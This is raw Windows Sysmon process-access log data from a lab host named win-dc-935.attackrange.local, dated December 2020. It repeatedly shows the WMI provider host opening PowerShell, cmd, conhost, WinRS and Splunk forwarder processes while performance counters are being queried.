13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004953Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004952Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004951Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004950Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004949Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004948Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004947Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004946Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004945Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004944Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004943Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004942Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004941Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004940Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004939Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004938Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 